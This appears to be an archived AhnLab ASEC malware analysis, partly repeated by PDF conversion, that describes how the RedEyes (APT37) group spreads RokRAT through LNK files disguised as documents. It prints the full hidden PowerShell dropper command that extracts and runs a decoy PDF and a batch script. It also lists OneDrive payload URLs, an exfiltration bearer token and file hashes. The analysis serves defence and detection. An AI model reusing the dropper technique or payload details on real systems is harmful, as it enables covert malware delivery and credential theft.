RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes
(ScarCruft) - ASEC
By ATCP
Published: 2023-04-20 · Archived: 2026-04-05 15:14:16 UTC
AhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37,
ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month,
has also recently distributed the RokRAT malware through LNK files. RokRAT is malware that is capable of collecting user
credentials and downloading additional malware. The malware was once distributed through HWP and Word files. The LNK
files that were discovered this time contain PowerShell commands that can perform malicious behavior by creating and
executing a script file along with a normal file in the temp folder. The confirmed LNK filenames are as follows: 
230407Infosheet.lnk
April 29th 2023 Seminar.lnk
2023 Personal Evaluation.hwp.lnk
NK Diplomat Dispatch Selection and Diplomatic Offices.lnk
NK Diplomacy Policy Decision Process.lnk
The “230407Infosheet.lnk” file is disguised with a PDF icon and contains a malicious PowerShell command.
https://asec.ahnlab.com/en/51751/
Page 1 of 6

Figure 1. Properties of the LNK file
The LNK file contains not only a PowerShell command, but also the data of a normal PDF file along with malicious script
codes. Furthermore, there are dummy bytes that start from 0x89D9A all the way to 0x141702A.
Figure 2. Dummy data that exists at the end of the LNK file
The PowerShell command that is executed through cmd.exe upon executing the LNK file is as follows: 
/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match ‘System32’ -or $dirPath -
Match ‘Program Files’) {            $dirPath = ‘%temp%’            }; $lnkpath = Get-ChildItem -Path $dirPath -
Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty
FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath =
‘%temp%\230407정보지.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^&
$pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath =
‘%temp%\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^&
$exePath;
The LNK file is read up to 0x890F4 and is saved and executed with the filename “230407Infosheet.pdf” in the Temp folder
while excluding the first 0x9AA. Afterward, it reads up to 0x89D9A of the LNK file and is saved and executed in the Temp
folder with the filename “230412.bat” after excluding 0x890F4, which is the byte where the PDF data exists.
https://asec.ahnlab.com/en/51751/
Page 2 of 6

Figure 3. PDF data located at 0x9AA of the LNK file
Figure 4. Script code located at 0x890F4 of the LNK file
Figure 5. Files created in the Temp folder
The threat actor executes a normal PDF file to make the behavior appear normal before carrying out their malicious
behavior through the script file.
Figure 6. 230407Infosheet.pdf (normal file)
https://asec.ahnlab.com/en/51751/
Page 3 of 6

The script file executed at the same time contains the following PowerShell command that executes malicious commands
which exist as HEX values.
Figure 7. 230412.bat
The final PowerShell command that is executed downloads the encoded data from
hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSj
decodes it, and injects it into the PowerShell process to perform malicious behavior.
Figure 8. Final PowerShell command that is executed
Figure 9. Malicious file uploaded to OneDrive
The injected data is the RokRAT malware that is capable of collecting user credentials and downloading additional malware.
The collected information is sent to the threat actor’s cloud server using cloud services such as pcloud and yandex. The
UserAgent in the request header is disguised as Googlebot. The certificate token used to send files is as follows: 
Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX
The additional normal files executed through the malicious LNK are as follows:
https://asec.ahnlab.com/en/51751/
Page 4 of 6

Figure 10. April 29th 2023 Seminar.pdf created through April 29th 2023 Seminar.lnk
Figure 11. 230402.hwp created through NK Diplomacy Policy Decision Process.lnk
As RokRAT has been in distribution for a while and is being distributed in various forms such as Word files, users are
advised to take extra caution. 
Reddoor (RokRAT) Malware Analysis Report – May 9, 2022
Korean APT Attacks Using Ruby Script Analysis Report – Apr. 7, 2021
[File Detection] Dropper/LNK.Agent (2023.04.08.00) Downloader/BAT.Agent (2023.04.08.00) 
MD5
0f5eeb23d701a2b342fc15aa90d97ae0
461ce7d6c6062d1ae33895d1f44d98fb
657fd7317ccde5a0e0c182a626951a9f
8e5cac0159a31ea808973508ce164e1d
https://asec.ahnlab.com/en/51751/
Page 5 of 6

aa8ba9a029fa98b868be66b7d46e927b
Additional IOCs are available on AhnLab TIP.
URL
https[:]//1drv[.]ms/i/s!AhXEXLJSNMPTbfzgUMxNbInC6
https[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZE
https[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQ
Additional IOCs are available on AhnLab TIP.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner
below.
Source: https://asec.ahnlab.com/en/51751/
https://asec.ahnlab.com/en/51751/
Page 6 of 6

  https://asec.ahnlab.com/en/51751/   
Figure 1. Properties of the LNK file    
The LNK file contains not only a PowerShell command, but also the data of a normal PDF file along with malicious script
codes. Furthermore, there are dummy bytes that start from 0x89D9A all the way to 0x141702A. 
Figure 2. Dummy data that exists at the end of the LNK file   
The PowerShell command that is executed through cmd.exe upon executing the LNK file is as follows: 
/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath-Match ‘System32’-or $dirPath-
Match ‘Program Files’) { $dirPath = ‘%temp%’ }; $lnkpath = Get-ChildItem-Path $dirPath-
Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty 
FullName; $pdfFile = gc $lnkpath -Encoding Byte-TotalCount 00561396-ReadCount 00561396; $pdfPath =
‘%temp%\230407정보지.pdf’;  sc $pdfPath ([byte[]]($pdfFile ^| select-Skip 002474))-Encoding Byte; ^&
$pdfPath; $exeFile = gc $lnkpath -Encoding Byte-TotalCount 00564634-ReadCount 00564634; $exePath =
‘%temp%\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select-Skip 00561396)) -Encoding Byte; ^&
$exePath;     
The LNK file is read up to 0x890F4 and is saved and executed with the filename “230407Infosheet.pdf”  in the Temp folder
while excluding the first 0x9AA. Afterward, it reads up to 0x89D9A of the LNK file and is saved and executed in the Temp
folder with the filename “230412.bat” after excluding 0x890F4, which is the byte where the PDF data exists.
  Page 2 of 6